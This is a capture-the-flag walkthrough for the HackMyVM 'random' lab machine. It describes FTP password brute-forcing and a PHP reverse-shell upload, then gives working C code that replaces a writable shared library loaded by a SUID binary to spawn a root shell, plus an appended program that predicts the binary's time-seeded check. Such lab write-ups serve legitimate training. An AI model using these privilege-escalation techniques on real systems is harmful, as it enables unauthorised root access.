hackmyvm-random walkthrough
2022-08-02 03:25:00 【xdeclearn】
1. Get a reverse shell
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Browsing the web server on port 80 reveals two user names, eleanor and alan.
Brute-force the FTP login to recover eleanor's password.
The same credentials work over SSH: log in with sftp as eleanor, change into /html, upload a PHP reverse shell, then request it over HTTP to get a shell.
2. Privilege escalation
Searching for SUID binaries turns up /home/alan/random.
random is linked against the shared library /lib/librooter.so, which we can replace (confirm the dependency with ldd /home/alan/random and the write permission with ls -l /lib/librooter.so). Because the library is resolved from its normal absolute path rather than through LD_PRELOAD or LD_LIBRARY_PATH, the dynamic loader's secure-execution mode for SUID binaries does not stop it from being loaded.
Decompiling random with IDA gives:
int __cdecl main(int argc, const char **argv, const char **envp)
{
time_t v3; // rdi
int v5; // [rsp+1Ch] [rbp-4h]
v5 = atoi(argv[1]);          // the number supplied on the command line
v3 = time(0LL);              // seed is the current second
srand(v3);
if ( v5 == rand() % 9 + 1 )  // accepted value is always in 1..9
makemeroot(v3);            // imported from librooter.so; v3 is a decompiler artifact, the function takes no argument
else
puts("Wrong number");
return 0;
}
Because rand() % 9 + 1 can only produce 1..9 and the seed is the current second, a fixed guess in that range reaches makemeroot on roughly one attempt in nine, so a few retries are enough regardless of the random value. We rebuild librooter.so from this code so that makemeroot spawns a root shell:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Replacement for the makemeroot() exported by /lib/librooter.so.
 * random is SUID root, so the effective uid is 0 when this runs;
 * setuid(0)/setgid(0) then make the real ids root too, so bash
 * does not drop privileges. */
void makemeroot()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

Compile it as a shared object (for example gcc -shared -fPIC -o librooter.so rooter.c), copy it over /lib/librooter.so, then run /home/alan/random with a guess in 1..9 a few times; once the guess matches the seeded value, makemeroot is called and you get a root shell.
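Instead of guessing, the accepted value can be computed: the check is seeded with time(0), so any process that calls srand() with the same second gets the same rand() output. The following added example (not part of the original walkthrough) reproduces the check, shows why a fixed guess eventually hits, and execs the SUID target with the predicted argument. The target path /home/alan/random comes from the walkthrough; the function names and the constructed seed values are assumptions.

```c
/* Added example: predict the argument /home/alan/random accepts rather
 * than retrying blindly.  Assumes glibc's rand()/srand(), the same
 * implementation the target links against. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <sys/wait.h>

/* Same computation as the decompiled main(): seed with a given second,
 * return rand() % 9 + 1 (always in 1..9). */
int expected_number(time_t seed)
{
    srand((unsigned int)seed);
    return rand() % 9 + 1;
}

/* Count how many of the `seconds` seconds starting at `from` would accept
 * a fixed guess; this is why "try a few more times" works. */
int hits_for_fixed_guess(int guess, time_t from, int seconds)
{
    int hits = 0;
    for (int i = 0; i < seconds; i++)
        if (expected_number(from + i) == guess)
            hits++;
    return hits;
}

/* Fork and exec the target with the given number as argv[1].
 * Returns the child's exit status, or -1 if fork/wait failed.
 * A failed exec is reported as status 127. */
int run_target(const char *path, int number)
{
    char arg[16];
    snprintf(arg, sizeof arg, "%d", number);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl(path, path, arg, (char *)NULL);
        _exit(127);                 /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* Target path from the walkthrough; can be overridden on the command line. */
    const char *target = argc > 1 ? argv[1] : "/home/alan/random";
    time_t now = time(NULL);
    int n = expected_number(now);
    printf("seed %ld -> expected argument %d\n", (long)now, n);

    /* Must run within the same second as the seed above; if the clock
     * ticks over between the two time() calls, just run again. When the
     * replaced makemeroot() succeeds this blocks until the shell exits. */
    int rc = run_target(target, n);
    if (rc < 0)
        perror("run_target");
    return rc < 0 ? 1 : 0;
}
```

The prediction only holds if the second does not change between this program's time() call and the target's, and the exit status cannot distinguish a hit from "Wrong number" (both paths return 0), so watch for the shell prompt rather than the return code.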